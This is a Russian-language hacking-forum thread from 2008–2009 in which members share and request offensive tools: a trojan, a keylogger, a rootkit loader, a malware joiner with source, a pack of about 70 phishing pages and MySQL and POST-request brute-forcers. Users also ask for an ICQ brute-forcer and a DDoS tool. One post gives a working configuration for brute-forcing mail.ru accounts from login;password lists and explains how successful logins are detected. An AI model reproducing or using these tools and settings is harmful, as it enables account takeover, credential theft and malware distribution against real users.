Easy Rapidshare Points 3.0



Что то мне это вирус напоминает. thumbsup.gif
Вобщем, скачал, проверил NOD32-ом, распакавал, а програмульки то в папке не оказалось, хотя в архиве её видно и НОД не сработал... blink.gif
Попробовал запустить прямо из архива а РАР мне и говорит: "А распаковывать то нечего"... wacko.gif

Вот я и говорю что мне эта програмка вирус напоминает, хотя может я чегонить не понимаю? Тогда прошу разъяснений или объяснений. huh.gif

Автор: MYSTiQUE 13.11.2008, 11:15

А архив не SFX случайно......? Или обычный РАР?

Автор: MYSTiQUE 13.11.2008, 16:39

Троян EPS II

» Описание «


Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.


 eps.zip ( 196,08 килобайт ) : 23
 

Автор: MYSTiQUE 13.11.2008, 17:15

Keyboard Grabber
не ругайте... Прога хоть и старовата, но работает отменно.. smile.gif

» Описание «


Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


 Копия_kbg.zip ( 184,4 килобайт ) : 22
 

Автор: Gerzog 13.11.2008, 18:26

Цитата(MYSTiQUE @ 13.11.2008, 12:15) *
А архив не SFX случайно......? Или обычный РАР?


Дык обычный РАР, скачал с того самого линка в посте на Рапиду... huh.gif

Автор: Rim 22.11.2008, 14:57

Cracker Utilities

Размер: 12,5Мб

» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Rim 11.12.2008, 20:38

IEInspector HTTP Analyzer Full Edition v3.3.2.179

Интерфейс: Английский
Размер: 3,8Мб
ОС: Windows® 98/2000/XP/Vista

» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Rim 26.12.2008, 17:04

Super Mail Spider v2.85

Интерфейс: Английский
Размер: 2.04Мб
ОС: Windows®

» Описание «

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: MYSTiQUE 29.01.2009, 12:18

Rootkit-Driver-Loader


1 OSR Driver Loader is a program, which allows Windows Device Driver developers an easy way to register, unregister, start, and stop their Windows Device Driver.

2 Kernel Mode Driver Manager

Intended to make testing of Kernel Mode Drivers.
Installing, Starting, Stoping and Uninstalling.

3 Install Drv описание в архиве

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.

Автор: MYSTiQUE 13.02.2009, 15:33

DSJoiner13


бинарник и исходники

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.

Автор: ter10n 15.02.2009, 16:09

Dark Brute 0.9.1 - Хорошо настраиваемый двиг POST Запросов



Это демо версия поддерживает 5 потоков.

На 400 потоках + чекнутый прокси из паблика: 20-30ппс После обновления, по идее должно было стать больше, но измерять лень) , гуды вроде не пропускает.

+ Работает с прокси листом
+ Может работать и без прокси
+ В полной версии до 1700 потоков
- Пока в процессе отладки
- Оллидбг вам поможет добится максимум 1 лишнего потока, так что не старайтесь

в сорс.тхт кидайте login;password, для чека - инструкцию смотри

Ниже код для тех кто понимает пост запросы

Код
http://win.mail.ru/cgi-bin/auth?     ////адрес скрипта
1                                  ////необходима ли доп. строка до логина
page=&post=&login_from=            ////доп. строка до логина
Login=                                  ////строка перед самим логином
1                                    ////необходима ли доп. строка после логина и до пароля
Domain=mail.ru                       ////доп. строка после логина и до пароля
Password=                              ////Строка перед самим логином
0                                         ////необходима ли доп. строка после пароля
                                            ////Раз нет то и не будем ее писать.
0                                          ////Метод: 0 - парсим ответ, 1 - 302 moved, 2 - 200 ок
53566                                    ////так как выше выбран 0 то нужно указать символ по которому смотрим гуд или не гуд
                                           ////тут пустая строка, ибо, например у маил.ру при плохом пароле нам показывают только форму ввода логина-пароля, а при удачном нам показываю весь интерфейс всего ящика, соответственно символ номер 53566 существует только у хорошего пароля, а у плохого символ под этим номером не существует => он равен ""
1                                        ////Allowredirect назначение следует из названия


Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: MYSTiQUE 26.02.2009, 08:26

Сборка фэйков


примерно 70 фэйков.
размер - 2,66 мБ

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: MYSTiQUE 14.04.2009, 09:26

XND IP-Spoofing Local HTTP-Proxy 1.0


XND IP-Spoofing Local HTTP-Proxy
XND ISHP это программа, обеспечивающая вашу анонимность при использовании протокола
HTTP/1.x за счет внешних произвольных HTTP-прокси-серверов. Программа выполнена
в виде локального прокси-сервера, адрес которого необходимо указать в вашем
веб-браузере.

Размер архива - 26,2 кБ.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.



Автор: MMETT 15.04.2009, 14:45

Цитата(Hroft_clone3 @ 3.06.2008, 18:11) *
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(



Пожалуйста подскажите новые ссылки на лекарство для Advanced Office Password Recovery 4, указанные ссылки пустые :(

Автор: MYSTiQUE 16.04.2009, 09:22

r57mysql_brute


маленький брутфорсер на С для MySQL

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.



Автор: johnbryant 23.05.2009, 19:41

выложите пожалуйста программу для брута ICQ номеров
заранее спасибо.

Автор: DDoSmoToRm.tEam 27.05.2009, 21:08

Ребят,ищу программу ддосит через хабы т.е. посылка запросов идет , рубит мрачно . А то потерял я ее обыскался уже ... если есть у кого поделитесь пожалуйста.

Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)